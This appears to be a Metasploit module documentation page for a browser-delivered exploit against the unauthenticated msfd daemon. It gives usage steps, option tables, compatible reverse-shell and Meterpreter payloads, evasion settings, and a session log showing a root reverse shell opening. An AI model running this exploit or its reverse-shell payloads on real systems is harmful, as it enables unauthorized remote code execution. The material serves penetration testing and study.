Metasploit msfd Remote Code Execution via Browser - Metasploit
This page contains detailed information about how to use the exploit/multi/browser/msfd_rce_browser metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Metasploit msfd Remote Code Execution via Browser
Module: exploit/multi/browser/msfd_rce_browser
Source code: modules/exploits/multi/browser/msfd_rce_browser.rb
Disclosure date: 2018-04-11
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): ruby
Supported platform(s): Ruby
Target service / protocol: -
Target network port(s): -
List of CVEs: -
Metasploit's msfd-service makes it possible to get a msfconsole-like interface over a TCP socket. This module connects to the msfd-socket through the victim's browser. To execute msfconsole-commands in JavaScript from a web application, this module places the payload in the POST-data. These POST-requests can be sent cross-domain and can therefore be sent to localhost on the victim's machine. The msfconsole-command to execute code is 'rbi -e "CODE"'. Exploitation when the browser is running on Windows is unreliable and the exploit is only usable when IE is used and the quiet-flag has been passed to msf-daemon.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use exploit/multi/browser/msfd_rce_browser
msf exploit(msfd_rce_browser) > exploit
Knowledge Base
Description
This module connects to the Metasploit msf daemon and uses the ruby interpreter to achieve a shell. This module can be used when the vulnerable service is only listening on localhost and the attacker has not achieved a foothold on the machine. To achieve code execution, the data is sent from the victim's browser. To achieve this, the victim must visit the attacker's web site.
Vulnerable Application
Metasploit has a legacy method of providing remote access. The msf daemon provides no means of authentication and is therefore vulnerable against an attacker who has IP access to the daemon. In those cases where the daemon is listening on localhost, we take advantage of the fact that the victim's web browser has IP access to the daemon.
Because the msfconsole-program is line-based, it is possible to successfully send commands through the HTTP-protocol. This module takes advantage of this by placing the msfconsole-command in the POST-data of a HTTP-request. Since these POST-requests are considered safe to send cross-domain, it is possible to send them from the attacker's web application and to localhost using the victim's browser.
All versions of Metasploit are affected by this module, however testing has only been performed on the following targets:
- Metasploit 5.0.0 on Ubuntu 16.04 (using Firefox and Chrome)
- Metasploit 4.16.51 on Windows 7 (using IE, exploitation failed in Firefox and Chrome)
NB! Exploitation on Windows had a higher degree of success, when the quiet-flag was sent to the msf daemon. On Linux, it made no difference.
Source code and installers:
Verification Steps
- Start the vulnerable service
msfd -q -f
- Start
msfconsole
- Do:
use exploit/multi/browser/msfd_rce_browser
- Do:
set REMOTE_IP [IP]
(default:127.0.0.1
) - Do:
set RPORT [PORT]
(default:55554
) - Do:
set PAYLOAD [PAYLOAD]
- Do:
exploit
- Do: Visit the listed URL from the victim's machine
- You should get a shell
Options
Options unique for this module is described below.
REMOTE_IP
IP to target when running inside the victim's browser.
REMOTE_PORT
Remote port the vulnerable service is running at, default is 55554.
Scenarios
Through the victim's browser
msf5 > use exploit/multi/browser/msfd_rce_browser
msf5 exploit(multi/browser/msfd_rce_browser) > set payload ruby/shell_reverse_tcp
payload => ruby/shell_reverse_tcp
msf5 exploit(multi/browser/msfd_rce_browser) > set lhost 192.168.0.17
lhost => 192.168.0.17
msf5 exploit(multi/browser/msfd_rce_browser) > set lport 443
lport => 443
msf5 exploit(multi/browser/msfd_rce_browser) > exploit
[*] Exploit running as background job 0.
[-] Handler failed to bind to 192.168.0.17:443:- -
[*] Started reverse TCP handler on 0.0.0.0:443
msf5 exploit(multi/browser/msfd_rce_browser) > [*] Using URL:
http://0.0.0.0:8080/J5ras6oYftFWW4
[*] Local IP: http://172.17.0.2:8080/J5ras6oYftFWW4
[*] Server started.
Visit the web site listed in a browser on the victim's machine and you should get the output below.
[*] 192.168.0.17 msfd_rce_browser - 192.168.0.17 msfd_rce_browser
Sending HTML...
[*] Command shell session 4 opened (172.17.0.2:443 -> 192.168.0.17:48376) at 2018-04-22 19:15:07 +0000
id
[*] exec: id
uid=0(root) gid=0(root) groups=0(root)
Go back to menu.
Msfconsole Usage
Here is how the multi/browser/msfd_rce_browser exploit module looks in the msfconsole:
msf6 > use exploit/multi/browser/msfd_rce_browser
[*] No payload configured, defaulting to generic/shell_reverse_tcp
msf6 exploit(multi/browser/msfd_rce_browser) > show info
Name: Metasploit msfd Remote Code Execution via Browser
Module: exploit/multi/browser/msfd_rce_browser
Platform: Ruby
Arch: ruby
Privileged: No
License: BSD License
Rank: Normal
Disclosed: 2018-04-11
Provided by:
Robin Stenvi <[email protected]>
Available targets:
Id Name
-- ----
0 Automatic
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
REMOTE_IP 127.0.0.1 yes Remote IP address when called from victim
REMOTE_PORT 55554 yes Remote port the service is running at
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload information:
Space: 8192
Avoid: 2 characters
Description:
Metasploit's msfd-service makes it possible to get a msfconsole-like
interface over a TCP socket. This module connects to the msfd-socket
through the victim's browser. To execute msfconsole-commands in
JavaScript from a web application, this module places the payload in
the POST-data. These POST-requests can be sent cross-domain and can
therefore be sent to localhost on the victim's machine. The
msfconsole-command to execute code is 'rbi -e "CODE"'. Exploitation
when the browser is running on Windows is unreliable and the exploit
is only usable when IE is used and the quiet-flag has been passed to
msf-daemon.
Module Options
This is a complete list of options available in the multi/browser/msfd_rce_browser exploit:
msf6 exploit(multi/browser/msfd_rce_browser) > show options
Module options (exploit/multi/browser/msfd_rce_browser):
Name Current Setting Required Description
---- --------------- -------- -----------
REMOTE_IP 127.0.0.1 yes Remote IP address when called from victim
REMOTE_PORT 55554 yes Remote port the service is running at
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.204.3 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
Advanced Options
Here is a complete list of advanced options supported by the multi/browser/msfd_rce_browser exploit:
msf6 exploit(multi/browser/msfd_rce_browser) > show advanced
Module advanced options (exploit/multi/browser/msfd_rce_browser):
Name Current Setting Required Description
---- --------------- -------- -----------
ContextInformationFile no The information file that contains context information
DisablePayloadHandler false no Disable the handler code for the selected payload
EnableContextEncoding false no Use transient context when encoding payloads
ListenerComm no The specific communication channel to use for this service
SSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
SSLCompression false no Enable SSL/TLS-level compression
SendRobots false no Return a robots.txt file if asked for one
URIHOST no Host to use in URI (useful for tunnels)
URIPORT no Port to use in URI (useful for tunnels)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Payload advanced options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
ARCH no The architecture that is being targeted
PLATFORM no The platform that is being targeted
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the multi/browser/msfd_rce_browser module can exploit:
msf6 exploit(multi/browser/msfd_rce_browser) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the multi/browser/msfd_rce_browser exploit:
msf6 exploit(multi/browser/msfd_rce_browser) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/generic/custom normal No Custom Payload
1 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
2 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
3 payload/multi/meterpreter/reverse_http normal No Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
4 payload/multi/meterpreter/reverse_https normal No Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
5 payload/ruby/pingback_bind_tcp normal No Ruby Pingback, Bind TCP
6 payload/ruby/pingback_reverse_tcp normal No Ruby Pingback, Reverse TCP
7 payload/ruby/shell_bind_tcp normal No Ruby Command Shell, Bind TCP
8 payload/ruby/shell_bind_tcp_ipv6 normal No Ruby Command Shell, Bind TCP IPv6
9 payload/ruby/shell_reverse_tcp normal No Ruby Command Shell, Reverse TCP
10 payload/ruby/shell_reverse_tcp_ssl normal No Ruby Command Shell, Reverse TCP SSL
Evasion Options
Here is the full list of possible evasion options supported by the multi/browser/msfd_rce_browser exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(multi/browser/msfd_rce_browser) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
HTML::base64 none no Enable HTML obfuscation via an embeded base64 html object (IE not supported) (Accepted: none, plain, single_pad, double_pad, random_space_injection)
HTML::javascript::escape 0 no Enable HTML obfuscation via HTML escaping (number of iterations)
HTML::unicode none no Enable HTTP obfuscation via unicode (Accepted: none, utf-16le, utf-16be, utf-16be-marker, utf-32le, utf-32be)
HTTP::chunked false no Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
HTTP::compression none no Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
HTTP::header_folding false no Enable folding of HTTP headers
HTTP::junk_headers false no Enable insertion of random junk HTTP headers
HTTP::no_cache false no Disallow the browser to cache HTTP content
HTTP::server_name Apache yes Configures the Server header of all outgoing replies
TCP::max_send_size 0 no Maximum tcp segment size. (0 = disable)
TCP::send_delay 0 no Delays inserted before every send. (0 = disable)
Go back to menu.
Related Pull Requests
Go back to menu.
See Also
Check also the following modules related to this module:
- auxiliary/crawler/msfcrawler
- auxiliary/scanner/msf/msf_rpc_login
- auxiliary/scanner/msf/msf_web_login
- auxiliary/server/android_browsable_msf_launch
- exploit/multi/misc/msfd_rce_remote
- exploit/multi/misc/msf_rpc_console
- exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
Authors
Robin Stenvi <robin.stenvi[at]gmail.com>
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.